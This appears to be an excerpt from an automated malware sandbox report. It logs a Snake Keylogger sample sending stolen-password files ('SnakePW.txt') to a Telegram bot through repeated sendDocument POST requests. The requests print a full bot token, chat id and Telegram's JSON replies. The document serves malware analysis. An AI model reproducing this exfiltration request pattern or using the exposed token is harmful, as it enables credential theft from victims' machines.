                                                                    2022-06-26 07:34:34 UTC454OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 39 62 61 30 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757199ba0d3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:34 UTC455INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:34 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:34 UTC455INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67054,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228874,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    27192.168.2.549795149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:49 UTC45OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756dad82d11
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:49 UTC45OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 61 64 38 32 64 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756dad82d11Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:49 UTC46INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:49 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:49 UTC46INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66774,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228769,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    270192.168.2.550203149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:35 UTC455OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575719d99d79
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:35 UTC456OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 64 39 39 64 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575719d99d79Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:35 UTC456INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:35 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:35 UTC457INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67055,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228875,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    271192.168.2.550205149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:35 UTC457OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571a0e113a
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:35 UTC457OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 30 65 31 31 33 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571a0e113aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:35 UTC458INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:35 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:35 UTC458INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67056,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228875,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    272192.168.2.550206149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:35 UTC459OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571a4c0e67
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:35 UTC459OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 34 63 30 65 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571a4c0e67Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:36 UTC460INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:36 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:36 UTC460INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67057,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228876,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    273192.168.2.550207149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:36 UTC461OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571a87aa22
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:36 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 38 37 61 61 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571a87aa22Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:36 UTC461INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:36 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:36 UTC462INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67058,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228876,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    274192.168.2.550208149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:36 UTC462OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571ac5a604
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:36 UTC463OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 63 35 61 36 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571ac5a604Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:36 UTC463INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:36 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:36 UTC463INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67059,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228876,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    275192.168.2.550209149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:37 UTC464OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571b03a336
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
